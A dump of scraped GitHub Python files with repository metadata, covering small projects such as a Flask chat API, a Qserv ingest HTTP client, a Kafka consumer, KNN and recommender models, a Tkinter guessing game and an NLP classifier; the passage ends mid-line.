__init__(self,x):\n\t\tself.neighbours=[]\n\t\tself.name=x\n\t\tself.complist=[]\ns = raw_input()\nnumbers = map(int, s.split())\nn=numbers[0]\nm=numbers[1]\nA=[]\nfor i in range(n):\n\tA.append(Node(i))\n\nfor i in range(m):\n\ts = raw_input()\n\tnumbers = map(int, s.split())\t\n\tA[numbers[0]].neighbours.append(A[numbers[1]])\n\tA[numbers[1]].neighbours.append(A[numbers[0]])","repo_name":"AbhishekTiwari0812/python_codes","sub_path":"HackerRankGraph1.py","file_name":"HackerRankGraph1.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19519442865","text":"from global_data import online_clients\nimport rsa\n\n\ndef save_keys(pubkey, privkey):\n with open('public_key.pem', 'wb') as f:\n f.write(pubkey.save_pkcs1())\n with open('private_key.pem', 'wb') as f:\n f.write(privkey.save_pkcs1())\n\n\n# 从文件中加载公钥和私钥\ndef load_keys():\n with open('public_key.pem', 'rb') as f:\n pubkey = rsa.PublicKey.load_pkcs1(f.read())\n\n with open('private_key.pem', 'rb') as f:\n privkey = rsa.PrivateKey.load_pkcs1(f.read())\n return pubkey, privkey\n\ndef find_userid_by_socket(socket_to_find):\n for socket, userid in online_clients.items():\n if socket == socket_to_find:\n return userid\n return None # 如果没找到对应的userid,返回None\n\n\ndef find_friend_id(user_id, chat_id):\n print(\"尝试通过chat_id和user_id找到friend_id……\")\n chat_id = str(chat_id)\n if len(chat_id) == 10:\n first_five = int(chat_id[:5])\n last_five = int(chat_id[5:])\n if first_five == user_id:\n friend_id = last_five\n return friend_id\n elif last_five == user_id:\n friend_id = first_five\n return friend_id\n else:\n print(\"无法确定 receiver_id,可能存在错误。\")\n return -1\n else:\n print(\"chat_id不是十位数,不是私聊chat_id\")\n return -2\n","repo_name":"TT2TER/Echoplex","sub_path":"server/tool_fuction.py","file_name":"tool_fuction.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"5091108692","text":"from flask import Flask\nfrom flask import request, jsonify\nimport base_chat\napp = Flask(__name__)\n\n@app.route('/continue', methods=['GET'])\ndef promptNext():\n \n response = base_chat.on_message(\"+\")\n output_string = response\n \n return output_string\n\n@app.route('/api', methods=['GET'])\ndef prompt():\n\n text = request.args.get('prompt')\n \n response = base_chat.on_message(text)\n output_string = response\n \n return output_string\n\n@app.route('/instruct', methods=['GET'])\ndef instruct():\n \n text = request.args.get('prompt')\n \n response = base_chat.on_message(\"+i \" + text)\n output_string = response\n \n return output_string\n\n@app.route('/reset', methods=['GET'])\ndef reset():\n base_chat.on_message(\"+reset\")\n return \"reset\"\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"RafaRed/RWKV-api","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"19305367203","text":"import getpass\nimport json\nimport logging\nimport os\nimport urllib.parse\nfrom typing import Any, Dict, Tuple, Union\n\n# ----------------------------\n# Imports for other modules --\n# ----------------------------\nimport requests\nfrom qserv import jsonparser\nfrom requests.adapters import HTTPAdapter\nfrom retry import retry\nfrom urllib3.util import Retry\n\nfrom . import util, version\nfrom .exception import IngestError, ReplicationControllerError\n\nDEFAULT_AUTH_PATH = \"~/.lsst/qserv\"\nDEFAULT_TIMEOUT_READ_SEC = 300.0\nDEFAULT_TIMEOUT_WRITE_SEC = 600.0\n\n# ---------------------------------\n# Local non-exported definitions --\n# ---------------------------------\n_DEFAULT_CONNECTION_TIMEOUT = 5.0\n_MAX_RETRY_ATTEMPTS = 3\n\n_LOG = logging.getLogger(__name__)\n\n\ndef download_file(url: str, dest: str) -> None:\n response = requests.get(url, stream=True)\n text_file = open(dest, \"wb\")\n for chunk in response.iter_content(chunk_size=1024):\n text_file.write(chunk)\n text_file.close()\n\n\ndef file_exists(url: str) -> bool:\n \"\"\"Check if a file exists on a remote HTTP server.\"\"\"\n response = requests.head(url)\n return response.status_code == 200\n\n\ndef json_load(base_url: str, filename: str) -> Dict[Any, Any]:\n \"\"\"Load a JSON file located at a given URL.\n\n Parameters\n ----------\n base_url: `str`\n JSON file location\n filename: `str`\n JSON file name\n\n Returns\n -------\n json_data: `dict`\n JSON data represented as a dictionary\n\n Raises\n ------\n IngestError:\n Raise is URI scheme is not in http://, https://, file://\n\n \"\"\"\n str_url = urllib.parse.urljoin(util.trailing_slash(base_url), filename)\n url = urllib.parse.urlsplit(str_url, scheme=\"file\")\n if url.scheme in [\"http\", \"https\"]:\n r = requests.get(str_url)\n return r.json()\n elif url.scheme == \"file\":\n with open(url.path, \"r\") as f:\n return json.load(f)\n else:\n raise IngestError(\"Unsupported URI scheme for \", url)\n\n\ndef _get_retry_object(retries: int = 5, backoff_factor: float = 0.2) -> Retry:\n \"\"\"Create an instance of :obj:`urllib3.util.Retry`.\n\n With default arguments (5 retries with 0.2 backoff factor), urllib3 will\n sleep for 0.2, 0.4, 0.8, 1.6, 3.2 seconds between attempts.\n\n \"\"\"\n\n # See\n # https://findwork.dev/blog/advanced-usage-python-requests-timeouts-retries-hooks/#retry-on-failure\n return Retry(\n total=retries,\n read=retries,\n connect=retries,\n allowed_methods=[\"GET\"],\n backoff_factor=backoff_factor,\n status_forcelist=[429, 500, 502, 503, 504],\n )\n\n\nclass Http:\n \"\"\"Manage http(s) connections\n designed to connect to Qserv Replication Controller\"\"\"\n\n def __init__(\n self,\n timeout_read_sec: float = DEFAULT_TIMEOUT_READ_SEC,\n timeout_write_sec: float = DEFAULT_TIMEOUT_WRITE_SEC,\n auth_path: str = DEFAULT_AUTH_PATH,\n ) -> None:\n \"\"\"Set http connections retry/timeout errors.\"\"\"\n self.auth_path = auth_path\n adapter = HTTPAdapter(max_retries=_get_retry_object())\n # Session is only used for the GET method\n self.http = requests.Session()\n self.http.mount(\"https://\", adapter)\n self.http.mount(\"http://\", adapter)\n self.authKey = self._authenticate()\n self.timeout_read_sec = timeout_read_sec\n self.timeout_write_sec = timeout_write_sec\n\n def is_reachable(self, url: str) -> bool:\n \"\"\"Check if a given http URL is reachable through the network.\"\"\"\n try:\n self.http.head(url)\n except requests.exceptions.ConnectionError as e:\n _LOG.warning(\"Unable to connect to url %s, error: %s\", url, e)\n return False\n return True\n\n def _authenticate(self) -> str:\n try:\n with open(os.path.expanduser(self.auth_path), \"r\") as f:\n authKey = f.read().strip()\n except IOError:\n _LOG.warning(\"Cannot find %s\", self.auth_path)\n authKey = getpass.getpass()\n return authKey\n\n def get(self, url: str, payload: Dict[str, Any] = dict(), auth: bool = True) -> Dict:\n \"\"\"Send a GET query to replication controller/worker http(s) URL\n\n Parameters\n ----------\n url : `str`\n Http(s) URL\n payload : `dict` [`str`, `Any`], optional\n JSON payload, Defaults to dict().\n auth : `bool`, optional\n Perform HTTP authentication. Defaults to True.\n\n Raises\n ------\n ReplicationControllerError\n Raised if JSON response contain an error code\n\n Returns\n -------\n response_json : `dict`\n JSON response\n\n \"\"\"\n if auth is True:\n payload[\"auth_key\"] = self.authKey\n params = {\"version\": version.REPL_SERVICE_VERSION}\n r = self.http.get(url, params=params, json=payload, timeout=self.timeout_read_sec)\n r.raise_for_status()\n response_json = r.json()\n jsonparser.raise_error(response_json)\n _LOG.debug(\"GET: success\")\n return response_json\n\n def post(\n self, url: str, payload: Dict[str, Any] = None, auth: bool = True, no_readtimeout: bool = False\n ) -> Dict:\n \"\"\"Send a POST query to an http(s) URL.\n\n Parameters\n ----------\n url : `str`\n Http(s) URL\n payload : `Dict[str, Any]`, optional\n JSON payload, Defaults to None.\n auth : `bool`, optional\n Perform HTTP authentication. Defaults to True.\n timeout : `int`, optional\n Query time-out. Defaults to None.\n\n Raises\n ------\n ReplicationControllerError\n Raised if JSON response contain an error code\n\n Returns\n -------\n response_json : `dict`\n JSON response\n\n \"\"\"\n if payload is None:\n payload = dict()\n if auth is True:\n payload[\"auth_key\"] = self.authKey\n timeouts: Union[float, Tuple[float, float], Tuple[float, None]]\n if no_readtimeout:\n timeouts = (_DEFAULT_CONNECTION_TIMEOUT, None)\n else:\n timeouts = (_DEFAULT_CONNECTION_TIMEOUT, self.timeout_write_sec)\n try:\n r = requests.post(url, json=payload, timeout=timeouts)\n except (requests.exceptions.RequestException, ConnectionResetError) as e:\n _LOG.critical(\"Error when sending POST request to url %s\", url)\n e.args = (\n f\"POST request to url {url} with payload {payload} failed\",\n *e.args,\n )\n raise e\n r.raise_for_status()\n response_json = r.json()\n jsonparser.raise_error(response_json)\n _LOG.debug(\"POST %s: success\", url)\n return response_json\n\n @retry(requests.exceptions.ConnectTimeout, delay=5, tries=_MAX_RETRY_ATTEMPTS)\n def post_retry(\n self, url: str, payload: Dict[str, Any] = None, auth: bool = True, no_readtimeout: bool = False\n ) -> Dict:\n \"\"\"Send a POST query to an http(s) URL and retry on time-out error.\n\n Parameters\n ----------\n url : `str`\n Http(s) URL\n timeout : `int`\n Timeout in seconds\n payload : `Dict[ str, Any ]`, optional\n JSON payload, Defaults to None.\n auth : `bool`, optional\n Perform HTTP authentication. Defaults to True.\n\n Returns:\n response_json : `dict`\n JSON response\n \"\"\"\n if payload is None:\n payload = dict()\n return self.post(url, payload, auth, no_readtimeout)\n\n def put(self, url: str, payload: Dict[str, Any] = None, no_readtimeout: bool = True) -> Dict:\n \"\"\"Send a PUT query to an http(s) URL.\n\n Parameters\n ----------\n url : str\n Http(s) URL\n payload : Dict[str, Any], optional\n JSON payload, by default None\n timeout : int, optional\n Time-out for query, by default None\n\n Returns\n -------\n response_json : `dict`\n JSON response\n\n Raises\n ------\n ReplicationControllerError\n Raised if JSON response contain an error code\n \"\"\"\n if payload is None:\n payload = dict()\n\n # Set version if it does not exists\n payload[\"version\"] = payload.get(\"version\", version.REPL_SERVICE_VERSION)\n payload[\"auth_key\"] = self.authKey\n\n timeouts: Union[float, Tuple[float, float], Tuple[float, None]]\n if no_readtimeout:\n timeouts = (_DEFAULT_CONNECTION_TIMEOUT, None)\n else:\n timeouts = (_DEFAULT_CONNECTION_TIMEOUT, self.timeout_write_sec)\n r = requests.put(url, json=payload, timeout=timeouts)\n r.raise_for_status()\n response_json = r.json()\n jsonparser.raise_error(response_json)\n _LOG.debug(\"PUT: success\")\n return response_json\n\n def delete(self, url: str, timeout: int = None) -> Dict:\n \"\"\"Send a DELETE query to an http(s) URL.\n\n Parameters\n ----------\n url : `str`\n Http(s) URL\n timeout : `int`, optional\n Time-out for query, by default None\n\n Returns\n -------\n response_json : `dict`\n JSON response\n\n Raises\n ------\n ReplicationControllerError\n Raised if JSON response contain an error code\n \"\"\"\n json = {\"version\": version.REPL_SERVICE_VERSION, \"auth_key\": self.authKey}\n r = requests.delete(url, json=json, timeout=timeout)\n r.raise_for_status()\n response_json = r.json()\n if not response_json[\"success\"]:\n _LOG.critical(\"%s %s\", url, response_json[\"error\"])\n raise ReplicationControllerError(\"Error in JSON response (DELETE)\", url, response_json[\"error\"])\n _LOG.debug(\"DELETE: success\")\n return response_json\n\n\ndef get_fqdn(fqdns: str, port: int, scheme: str = \"http\") -> str:\n \"\"\"Return fqdn of the first reachable scheme://fqdn:port entry.\n\n Parameters\n ----------\n fqdns: `str`\n comma-separated list of fqdns\n port: `int`\n url port to reach\n\n Returns\n -------\n fqdn : `str`\n First reachable host fqdn, empty string if not fqdn is reachable\n\n \"\"\"\n http = Http()\n for fqdn in fqdns.split(\",\"):\n url = f\"{scheme}://{fqdn}:{port}\"\n if http.is_reachable(url):\n return fqdn\n return \"\"\n","repo_name":"lsst-dm/qserv-ingest","sub_path":"rootfs/ingest/python/qserv/http.py","file_name":"http.py","file_ext":"py","file_size_in_byte":10532,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"10215354169","text":"from sklearn.datasets import load_breast_cancer\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import train_test_split \nimport matplotlib.pyplot as plt \nimport pandas as pd\nimport mglearn\nfrom sklearn.datasets.samples_generator import make_blobs\n\ncancer = load_breast_cancer()\n#print(cancer.DESCR)\nprint(cancer.feature_names)\nprint(cancer.target_names) \nprint(type(cancer.data))\nprint(cancer.data)\nprint(cancer.data.shape)\nprint(\"\\n================================\")\n\nraw_data = pd.read_csv('C:/Users/N0009/Downloads/breast-cancer-wisconsin-data.csv')\nprint(raw_data.tail)\n#mglearn.plots.plot_knn_classification(n_neighbors=7)\n#plt.show()\n\nX_train, X_test, y_train, y_test = train_test_split(cancer.data, cancer.target, stratify=cancer.target, random_state=42)\nknn = KNeighborsClassifier()\nknn.fit(X_train, y_train)\nprint('Accuracy of KNN n-5, on the training set: {:.2f}'.format(knn.score(X_train, y_train)))\nprint('Accuracy of KNN n-5, on the training set: {:.2f}'.format(knn.score(X_test, y_test)))\nX_train, X_test, y_train, y_test = train_test_split(cancer.data, cancer.target, stratify=cancer.target, random_state=65)\n\ntraining_accuracy = []\ntest_accuracy = []\n\nneighbors_setting = range(1,51)\nfor n_neighbors in neighbors_setting:\n clf = KNeighborsClassifier(n_neighbors = n_neighbors)\n clf.fit(X_train, y_train)\n training_accuracy.append(clf.score(X_train, y_train))\n test_accuracy.append(clf.score(X_test, y_test))\n\nplt.plot(neighbors_setting, training_accuracy, label=\"Train accuracy\")\nplt.plot(neighbors_setting, test_accuracy, label=\"Test accuracy\")\nplt.ylabel('Accuracy')\nplt.xlabel('Number of Neighbors')\nplt.legend()\nplt.show()","repo_name":"nicholasfl/Portfolio","sub_path":"nicholas/side_projects/machine_learning_based/kNN1.py","file_name":"kNN1.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42899276502","text":"# -*- coding: utf-8 -*-\r\n\r\n######################## ACTIONS ########################\r\ndef S_HO(x, h, m, w):\r\n \"\"\"\r\n Euclidean-time action of the 1D, 1-particle H.O.\r\n \r\n Parameters\r\n ----------\r\n x : list\r\n (positions of the) Path.\r\n\r\n Returns\r\n -------\r\n S : float\r\n Action of the path given as input.\r\n\r\n \"\"\"\r\n S_prime = 0.\r\n for i in range(len(x)-1):\r\n x_i1 = x[i+1]\r\n x_i = x[i]\r\n S_prime += ((x_i1-x_i)/h)**2+(w*(x_i1+x_i)/2)**2\r\n \r\n return 0.5*m*h*S_prime\r\n\r\ndef S_double_well(x, h, m, w):\r\n S_prime = 0.\r\n alpha = 0.05\r\n beta = -1.\r\n for i in range(len(x)-1):\r\n x_i1 = x[i+1]\r\n x_i = x[i]\r\n K = ((x_i1-x_i)/h)**2\r\n V = alpha*((x_i1+x_i)/2)**4 + beta*((x_i1+x_i)/2)**2\r\n S_prime += K + V\r\n \r\n return 0.5*m*h*S_prime","repo_name":"javier-rozalen/vfpg","sub_path":"MonteCarlo/modules/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"2477316395","text":"import asyncio\nimport functools\nfrom typing import Any, Callable, Coroutine, Dict, List, Tuple\nfrom aiokafka import AIOKafkaConsumer, ConsumerRecord, TopicPartition\nfrom asyncpg import Pool\nfrom models.generated.call_participant import AppDbPublicCallParticipantEnvelope\n\nfrom modules.env import BOOTSTRAP_SERVERS, GROUP_ID\nfrom modules.logger import LOGGER\nfrom modules.process_call import POLL_TIMEOUT\nfrom modules.staging_db import upload_call_participant\nfrom modules.utils import get_deserialize_fn\n\n\nIN_TOPIC = \"app-db.public.call_participant\"\n\nPOLL_TIMEOUT = 2500\n\nCallParticipantRecord = ConsumerRecord[bytes, AppDbPublicCallParticipantEnvelope]\n\n\nasync def _process_call_participant(consumer: AIOKafkaConsumer, pool: Pool) -> None:\n batch_count = 0\n\n async with consumer:\n while True:\n msg_batch: Dict[TopicPartition, List[CallParticipantRecord]]\n msg_batch = await consumer.getmany(timeout_ms=POLL_TIMEOUT, max_records=20)\n\n if not msg_batch:\n LOGGER.info(\"No new messages on topic: %s\", IN_TOPIC)\n continue\n\n batch_count += 1\n\n LOGGER.info(\"Got batch: %s\", batch_count)\n\n commit_offsets: Dict[TopicPartition, int] = {}\n uploading_batch: List[Tuple[int, int]] = []\n\n for tp, msgs in msg_batch.items():\n commit_offsets[tp] = msgs[-1].offset + 1\n\n for msg in msgs:\n if msg.value == None or msg.value.after == None:\n continue\n\n call_id = msg.value.after.call_id\n user_id = msg.value.after.user_id\n leave_time = msg.value.after.leave_time\n\n if call_id == None or user_id == None or leave_time == None:\n continue\n\n uploading_batch.append((call_id, user_id))\n\n await asyncio.gather(\n *(\n upload_call_participant(call_id, user_id, pool)\n for call_id, user_id in uploading_batch\n )\n )\n\n await consumer.commit(commit_offsets)\n\n\nasync def init_process_call_participant_fn() -> Callable[\n [Pool], Coroutine[Any, Any, None]\n]:\n LOGGER.info(\"Initializing %s topic processor\", IN_TOPIC)\n\n consumer = AIOKafkaConsumer(\n IN_TOPIC,\n bootstrap_servers=BOOTSTRAP_SERVERS,\n group_id=GROUP_ID,\n enable_auto_commit=False,\n auto_offset_reset=\"earliest\",\n isolation_level=\"read_committed\",\n value_deserializer=get_deserialize_fn(AppDbPublicCallParticipantEnvelope),\n )\n\n @functools.wraps(_process_call_participant)\n async def wrapper(pool: Pool) -> None:\n return await _process_call_participant(consumer, pool)\n\n return wrapper\n","repo_name":"Beaglefoot/streaming-etl","sub_path":"streaming-etl/services/transformer/modules/process_call_participant.py","file_name":"process_call_participant.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31919288306","text":"import json\nimport time\nfrom flask import Flask\n\napp = Flask(__name__)\n\n@app.route('/')\ndef interview():\n output = {}\n output[\"message\"] = \"Automate all the things!\"\n output[\"timestamp\"] = round(time.time())\n\n\n return json.dumps(output)\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0')","repo_name":"DoriftoShoes/pwh-project","sub_path":"app/main/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41053643372","text":"import numpy as np\n\n\nclass BaselineModel:\n \"\"\"\n Baseline recommendation model\n\n It doesn't use and collaborative information. It predict a missing rating as the mean rating of all training set,\n row mean, column mean or row-column deviation considered mean depending on the prediction mode\n \"\"\"\n\n def __init__(self, row_count, col_count, prediction_mode='row_col_mean'):\n \"\"\"\n :param row_count: Row count\n :param col_count: Column count\n :param prediction_mode: str -> Method of prediction. Possible values:\n - 'mean' : A missing rating is predicted as global mean\n - 'row_mean' : A missing rating is predicted as row mean\n - 'col_mean' : A missing rating is predicted as col mean\n - 'row_col_mean' : A missing rating is predicted by using global mean, row deviation from mean and column\n deviation from mean\n \"\"\"\n self.row_count = row_count\n self.col_count = col_count\n self.prediction_mode = prediction_mode\n self.mean = None\n self.row2deviation = None\n self.col2deviation = None\n\n def fit(self, X, y):\n \"\"\"\n X is Nx2,\n :param X: two dimensional np array where each line is [row_index, column_index]\n :param y: one dimensional np array\n \"\"\"\n mean = y.mean()\n self.mean = mean\n\n row2mean = np.zeros(self.row_count)\n row2count = np.zeros(self.row_count)\n\n col2mean = np.zeros(self.col_count)\n col2count = np.zeros(self.col_count)\n\n for (row, col), rating in zip(X, y):\n row2count[row] += 1\n row2mean[row] += rating\n\n col2count[col] += 1\n col2mean[col] += rating\n\n row2mean[row2count == 0] = mean\n col2mean[col2count == 0] = mean\n row2count[row2count == 0] = 1\n col2count[col2count == 0] = 1\n\n row2mean /= row2count\n col2mean /= col2count\n\n self.row2deviation = row2mean - mean\n self.col2deviation = col2mean - mean\n\n def predict(self, X):\n \"\"\"\n :param X: Nx2\n :return: y_predict\n \"\"\"\n y_predict = np.ones(X.shape[0]) * self.mean\n\n if self.prediction_mode == 'mean':\n return y_predict\n elif self.prediction_mode == 'row_mean':\n for i, (row, col) in enumerate(X):\n y_predict[i] = self.mean + self.row2deviation[row]\n elif self.prediction_mode == 'col_mean':\n for i, (row, col) in enumerate(X):\n y_predict[i] = self.mean + self.col2deviation[col]\n elif self.prediction_mode == 'row_col_mean':\n for i, (row, col) in enumerate(X):\n y_predict[i] = self.mean + self.row2deviation[row] + self.col2deviation[col]\n else:\n raise ValueError('Unexpected prediction mode: {}'.format(self.prediction_mode))\n\n return y_predict\n","repo_name":"seljukgulcan/eee-585-project","sub_path":"mr/models/baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12691784245","text":"import pyttsx3 as p\r\nimport pywhatkit\r\nimport speech_recognition as sr\r\n\r\n\r\nlistener = sr.Recognizer()\r\nengine = p.init()\r\nvoices = engine.getProperty(\"voices\")\r\nengine.setProperty(\"voice\", voices[0].id)\r\n\r\n\r\ndef talk(text):\r\n engine.say(text)\r\n engine.runAndWait()\r\n\r\ndef take_command():\r\n try:\r\n with sr.Microphone() as source:\r\n print(\"listening...\")\r\n voice = listener.listen(source)\r\n command = listener.recognize_google(voice)\r\n command = command.lower()\r\n if \"bot\" in command:\r\n command = command.replace(\"bot\", \"\")\r\n print(command)\r\n\r\n except:\r\n pass\r\n return command\r\n\r\n\r\ndef run_bot():\r\n command = take_command()\r\n print(command)\r\n if \"play\" in command:\r\n song = command.replace(\"play\", \"\")\r\n talk(\"playing\"+song)\r\n pywhatkit.playonyt(song)\r\n elif \"Hi\" and \"bot\" in command:\r\n talk(\"Hi sir what song do you want to listen\")\r\n else:\r\n talk(\"sorry i cant hear you\")\r\n\r\nwhile True:\r\n run_bot()\r\n\r\n","repo_name":"Phubet2547/Bot-play-music","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6826381882","text":"import pandas as pd\nimport argparse\n\nparser = argparse.ArgumentParser(description='Data Prep')\nparser.add_argument('file_loc', type=str, help='Path to the downloading dataset and name')\nparser.add_argument('smiles_col_name', type=str, help='Name of the Column of SMILES')\nparser.add_argument('save_path', type=str, help='Save Path of the Processed Data (CSV)')\nparser.add_argument('len',type=int,help='Number of Training Points needed in Train and Val Data')\nargs = parser.parse_args()\n\nchembl22 = pd.read_table(args.file_loc)\nprint(chembl22[args.smiles_col_name][0:10])\n\ndf = pd.DataFrame({'SMILES':chembl22[args.smiles_col_name]})\ndf.to_csv(args.save_path+'.csv')\n\ndf = pd.DataFrame({'SMILES':chembl22[args.smiles_col_name]})\ndf.to_csv(args.save_path+'.csv')\n\n#Shuffling the Data to remove any sampling bias\ndf.sample(frac=1)\n\ntrain_data = df.head(args.len)\nval_data = df.tail(args.len)\n\ntrain_data.to_csv(args.save_path+'_train.csv')\nval_data.to_csv(args.save_path+'_val.csv')\n","repo_name":"Ishan-Kumar2/Molecular_VAE_Pytorch","sub_path":"data_prep.py","file_name":"data_prep.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"48"} +{"seq_id":"22799459396","text":"#导包\nimport csv\n\nimport os\n\n\nclass CsvFileManager4:\n def read(self, filename):\n list =[] #声明一个空列表\n #指定csv文件的路径\n #path =\"C:\\Users\\51Testing\\PycharmProjects\\selenium7th\\data\\test_data.csv\"\n #这样生产的path路径有个缺点?可移值性比较差\n #更好的方法是:\n #os.path.dirname(__file__)这是一个固定的写法,用来获取当前文件的目录\n #os:操作系统 path:路径 driname :目录名 __file__是python内置的变量,表示当前文件路径:C:\\Users\\51Testing\\PycharmProjects\\selenium7th\\day5\n base_path = os.path.dirname(__file__)\n print(base_path)\n#用bast_path的好处:不管项目放到任何路径下面,都可以找到文件的绝对路径\n#我们真正想要的是csv文件路径,不是代码文件路径\n#所以我们可以通过basepath 计算出csv文件路径\n path = base_path.replace('day5','data/'+ filename)\n print(path)\n #打开指定文件\n #file = open(path,'r')\n #每次打开文件,用完之后都要关闭,释放系统资源\n #上机课用的是try ... finally 的方法\n #更常用的方法:是 with ...as 的语法结构\n with open(path,'r') as file:\n data_table = csv.reader(file)\n #循环遍历数据表中的每一行\n for row in data_table:\n print(row)\n\n\n #5/声明一个二维列表,保存data\n list.append(row)\n #在read 方法末尾.返回这个列表\n return list\n\n#一个CSV文件只适合保存一组测试用例\n#所以不同的测试用例,应该对应不同的csv 文件\n#filname 一个变量,可找到该路径下的所有csv 文件, 入需输入 在写入指定的csv文件\nif __name__ == '__main__':\n list = CsvFileManager4().read(\"test_data.csv\")\n print(list[0][0])\n\n\n","repo_name":"ddtest333/selenium7th","sub_path":"day5/csvFileManager4.py","file_name":"csvFileManager4.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41683326565","text":"#######################################################################\n# Python Tkinter Color Changing Number Guessing Game\n# Python Tkinter Juego de adivinanzas de números que cambian de color\n########################################################################\n\nfrom tkinter import *\nfrom random import randint\n\nroot = Tk()\nroot.title('Python Tkinter Color Changing Number Guessing Game')\nroot.iconbitmap('Python Tkinter Color Changing Number Guessing Game/icons/color.ico')\nroot.geometry(\"500x500\")\n\nnum_label = Label(root, text=\"Pick A Number\\nBetwen 1 and 10!\", font=(\"Brush Script MT\", 32))\nnum_label.pack(pady=20)\n\ndef guesser():\n if guess_box.get().isdigit():\n # Reset our label\n num_label.config(text=\"Pick A Number\\nBetwen 1 and 10!\")\n # find\n #ABS devuelve el valor apsoluto\n dif = abs(num - int(guess_box.get()))\n\n # check to see if correct\n\n if int (guess_box.get()) == num:\n bc = \"SystemButtonFace\"\n num_label.config(text=\"Correct\")\n elif dif == 5:\n # set background color to white\n bc = \"white\"\n elif dif < 5:\n bc = f'#ff{dif}{dif}{dif}{dif}'\n else:\n bc = f'#{dif}{dif}{dif}{dif}ff'\n\n # Change the cackground\n root.config(bg=bc)\n\n #change bg label\n num_label.config(bg=bc)\n\n else:\n # Delete entry and throw wror message\n guess_box.delete(0, END)\n num_label.config(text=\"Hey! Thet's Not A number\")\n\ndef rando():\n global num\n num = randint(1, 10)\n #clear the guess box\n guess_box.delete(0, END)\n # Change the colors back to normal\n num_label.config(bg=\" \")\n root.config(bg=\"SystemButtonFace\")\n\n\n\n\nguess_box = Entry(root, font=(\"Helvetica\", 100), width=2)\nguess_box.pack(pady=20)\n\nguess_button = Button(root, text=\"Submit\", command=guesser)\nguess_button.pack(pady=20)\n\nrand_button = Button(root, text=\"New Number\", command=rando)\nrand_button.pack(pady=20)\n\n# Genrate a random numer on state\nrando()\nroot.mainloop()","repo_name":"BrianMarquez3/Python-Course","sub_path":"Python Tkinter Color Changing Number Guessing Game/ColorChangingNumberGuessingGame.py","file_name":"ColorChangingNumberGuessingGame.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"48"} +{"seq_id":"32642266092","text":"import os\nimport pandas as pd\nimport numpy as np\n\ndf=pd.read_csv('bagofwords.csv',low_memory = False)\n\nds = ['DATA/LOCATION/1', 'DATA/LOCATION/2',\n 'DATA/LOCATION/3','DATA/LOCATION/4',\n 'DATA/LOCATION/5']\n\n\n\nfdf = pd.DataFrame() \na = []\nb = []\nc = []\nfor direct in ds:\n os.chdir(direct)\n for file in os.listdir():\n f = pd.read_csv(file,low_memory = False)\n fdf = pd.concat([fdf,f])\n # COMBINES ALL FILES LISTED IN THE ds DIRECTORY INTO ONE LARGE FILE\n #GOOD TRICK FOR CLEANING MULTIPLE LANDINGS\n \nfdf['HIT'] = np.where((fdf['features'].isna() == False) | (fdf['ADAS'] > 0), 1, 0) #CREATE A HIT FLAG FOR ADAS IDENTIFIED TOKENS\n\npositive = fdf[fdf['HIT'] > 0]['Value']\npositive = positive.append(df.token) \nnegative = fdf[fdf['HIT'] == 0]['Value']\nfull = fdf[['Value','HIT']]\n\n\nmore = pd.DataFrame()\nmore ['Value'] = df['token']\nmore['HIT'] = 1\n\nfull = full.append(more)\n\n#######################\n#######################\n# MODEL\n#######################\n#######################\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\n\ndef cv(data):\n count_vectorizer = CountVectorizer()\n\n emb = count_vectorizer.fit_transform(data)\n\n return emb, count_vectorizer\n\nlist_corpus = full[\"Value\"].tolist()\nlist_labels = full[\"HIT\"].tolist()\n\nX_train, X_test, y_train, y_test = train_test_split(list_corpus, list_labels, test_size=0.2, \n random_state=40)\n\nX_train_counts, count_vectorizer = cv(X_train)\nX_test_counts = count_vectorizer.transform(X_test)\n\n#######################\n#######################\n\nfrom sklearn.linear_model import LogisticRegression\n\nclf = LogisticRegression(C=30.0, class_weight='balanced', solver='newton-cg', \n multi_class='multinomial', n_jobs=-1, random_state=40)\nclf.fit(X_train_counts, y_train)\n\ny_predicted_counts = clf.predict(X_test_counts)\n\n\n#######################\n#######################\n\nfrom sklearn.metrics import accuracy_score, f1_score, precision_score, recall_score, classification_report\n\ndef get_metrics(y_test, y_predicted): \n # true positives / (true positives+false positives)\n precision = precision_score(y_test, y_predicted, pos_label=None,\n average='weighted') \n # true positives / (true positives + false negatives)\n recall = recall_score(y_test, y_predicted, pos_label=None,\n average='weighted')\n \n # harmonic mean of precision and recall\n f1 = f1_score(y_test, y_predicted, pos_label=None, average='weighted')\n \n # true positives + true negatives/ total\n accuracy = accuracy_score(y_test, 